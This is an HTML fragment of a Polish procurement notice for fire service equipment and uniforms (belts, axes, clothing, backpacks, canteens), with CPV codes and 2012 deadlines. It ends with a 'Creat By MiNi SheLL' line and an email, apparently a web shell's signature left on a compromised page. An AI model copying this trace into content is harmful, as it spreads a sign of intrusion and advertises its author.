<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pasy strażackie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonany zgodnie z wymaganiami techniczno - użytkowymi pkt. 1.5. Pasy strażackie określonymi szczegółowo w Załączniku do Rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 20 czerwca 2007 r.  (Dz. U. z 2007 r. Nr.143 poz.1002 z późn. zm.).

Ilość: 90 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 35.11.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.07.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Topór strażacki lekki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonany zgodnie z Polską Normą PN-M-51501, wg. pkt. 6.4. Topory strażackie określonym szczegółowo w Załączniku do Rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 20 czerwca 2007 r.  (Dz. U. z 2007 r. Nr.143 poz.1002 z późn. zm.).

Ilość: 90 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 35.11.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 23.07.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pochewka na toporek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość: 90 szt.

Opis: 
- Zgodna z Rozporządzeniem MSWiA - tabela należności Nr 5 przedmiotów ekwipunku osobistego dla strażaka (Dz. U. Nr. 4 poz. 25 z dnia 30 listopada 2005 r.) Zał. Nr 9.
- Wykonana ze skóry naturalnej w kolorze czarnym.  
- pasująca do toporka lekkiego określonego w pkt. 6.4. Topory strażackie Rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 20 czerwca 2007 r. (Dz. U. z 2007 r.     nr 143. poz. 1002 z późn. zm.)
- pasująca (nadająca się do przypięcia) do pasa strażackiego określonego w pkt. 1.5 Pasy strażackie Rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia                            20 czerwca 2007 r. (Dz. U. z 2007 r. nr 143. poz. 1002 z późn. zm.)
- posiadająca dwie kieszenie, w tym jedna na toporek,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 35.11.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 23.07.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Podpinka linkowa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - wykonana z linki polipropylenowej o długości ok. 1 m.,
- zakończona pętlą i haczykiem stalowym,
- zgodna z rozporządzeniem Ministra Spraw Wewnętrznych i Administracji z 30 listopada 2005 r. (Dz. U. Nr 4 poz. 25 z 2006 r.) - tabela należności Nr 5.
 Ilość: 70 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 35.11.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.07.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Ubrania koszarowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 4 częściowe - bluza, spodnie, czapka, kamizelka (kamizelka bez rękawów).
Wykonane zgodnie z Zarządzeniem Nr 9 Komendanta Głównego Państwowej Straży Pożarnej z dnia 5 lutego 2007 r. (Dz. Urz. KG PSP z dnia 23 października 2009 r.) - KT 22.
 Ilość: 250 kpl.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 35.81.11.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 24.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Obuwie koszarowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zgodne z Zarządzeniem Nr 9 Komendanta Głównego PSP (Dz.Urz. nr 2 z 23.10.2009r)
Nr Karty technicznej - KT- 27
 Ilość: 120 par.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 35.81.11.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 13.07.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Ubranie dla kadry dowódczo - sztabowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ubrania KDS wykonane zgodnie z Zarządzeniem nr 9 Komendanta Głównego PSP (Dz. Urz. 2 z dnia 23 października 2009r.) numer karty technicznej KT - 23

Ilość: 25 kpl.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 35.81.11.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Buty dla kadry dowódczo - sztabowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Buty dla Kadry dowódczo sztabowej wykonane zgodnie z Zarządzeniem nr 9 Komendanta Głównego PSP (Dz. Urz. 2 z dnia 23 października 2009r.) numer karty technicznej KT - 28

Ilość: 25 par.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 35.81.11.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Sztormiak.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonane zgodnie z Zarządzeniem Nr 9 Komendanta Głównego Państwowej Straży Pożarnej (Dziennik Urzędowy nr 2 KG PSP z 2009 r.) w sprawie wzorców oraz szczegółowych wymagań cech technicznych i jakościowych przedmiotów umundurowania, odzieży specjalnej i środków ochrony indywidualnej użytkowanych w PSP - Numer karty wymagań technicznych: KT 39.

Ilość: 30 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 35.81.11.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 24.07.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Koszulka letnia i koszulka zimowa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Koszulka letnia: Wykonana zgodnie z Zarządzeniem Nr 9 Komendanta Głównego Państwowej Straży Pożarnej (Dziennik Urzędowy nr 2 KG PSP z 2009 r.) w sprawie wzorców oraz szczegółowych wymagań cech technicznych i jakościowych przedmiotów umundurowania, odzieży specjalnej i środków ochrony indywidualnej użytkowanych w PSP - Numer karty wymagań technicznych: KT 6.

Ponadto:
Zamiast wymaganego w KT 6 pkt. 2.5. emblematu PSP i napisu STRAŻ, koszulka musi posiadać:

1. W przodzie koszulki po lewej stronie na wysokości piersi kieszeń z logo SGSP wg. wzoru:

średnica 67 mm (tolerancja 1 mm)

Opis logo:
Znak ma po lewej stronie połowę krzyża maltańskiego w kolorze granatowym, a po prawej trzy języki płomienia w kolorze czerwonym, wszystko w wieńcu z liści w kolorze złotym.     W dole, litery SGSP  w kolorze czarnym na czworoboku w kolorze złotym mającym jeden bok wypukły i jeden wklęsły, przy czym wszystkie elementy obrazowe mają kontur w kolorze czarnym.

2. Na plecach napis SGSP o wymiarach : długość 28,30 cm x wysokość 6,46 cm.
    Kolor zgodny z KT 6 jak napis STRAŻ.

Logo i napis wykonane metodą haftu komputerowego bądź inną techniką pozwalającą odwzorować ww. elementy, zgodnie z KT 6.

Koszulka zimowa: Wykonana zgodnie z Zarządzeniem Nr 9 Komendanta Głównego Państwowej Straży Pożarnej (Dziennik Urzędowy nr 2 KG PSP z 2009 r.) w sprawie wzorców oraz szczegółowych wymagań cech technicznych i jakościowych przedmiotów umundurowania, odzieży specjalnej i środków ochrony indywidualnej użytkowanych w PSP - Numer karty wymagań technicznych: KT 7.

Ilość: 
- koszulka letnia    300 szt.
- koszulka zimowa 300 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 35.81.11.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 11.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Worek marynarski.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonany z wysokiej jakości materiałów brezentowych bawełnianych i lnianych impregnowanych -  wodoodpornych. Wysoka wytrzymałość na ścieranie i rozdarcia. Posiada pas na ramię, wzmocniony na dole, ściągany sznurem przewlekanym przez oczka metalowe, 
z klamrą metalową, zapinką i kłódką. Pojemność ok. 120 - 150 ltr. Średnica ok. 140 cm, wysokość 1 metr. Kolor szary.
 Ilość: 100 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.93.11.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.07.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Plecak kostka - khaki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - Plecak w kolorze khaki,
- Wytrzymały na ścieranie i rozdarcia,
- Na klapie posiada mocowanie na menażkę,
- Wymiary: wys: 37 cm, szer: 31 cm, gł.: 22 cm (+/- 5 cm), 
- wykonane z mocnego materiału np. brezent, bawełna, len, impregnowany, wodoodporny, ze wzmocnionym spodem,
- szerokie szelki,
 Ilość: 50 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.93.11.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.07.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Manierka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - pojemność ok.  1,0 l,
- posiada pokrowiec,
- korek manierki przymocowany do szyjki specjalnym, zabezpieczającym przed zgubieniem paskiem,
- na zewnątrz pokrowca kieszonka na tabletki do odkażania wody,
- posiada mocowanie do paska lub plecaka.
Musi posiadać dopuszczenie do kontaktu z żywnością.
 Ilość: 30 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.22.12.60-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.07.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Menażka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Typ wojskowy, z wysokiej jakości stali kwasoodpornej, pojemność kociołka ok. 1,2 l., pojemność pokrywy do 0,8 l Waga menażki nie powinna przekroczyć 0,9 kg.
Musi posiadać dopuszczenie do kontaktu z żywnością.

Dopuszcza się również alternatywnie zaoferowanie menażki trzyczęściowej zawierającej jedno naczynie zamykane o pojemności ok. 1,2 l, jedno naczynie płytkie o pojemności ok.   0,8 l.

Ilość: 30 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.22.12.60-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.07.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com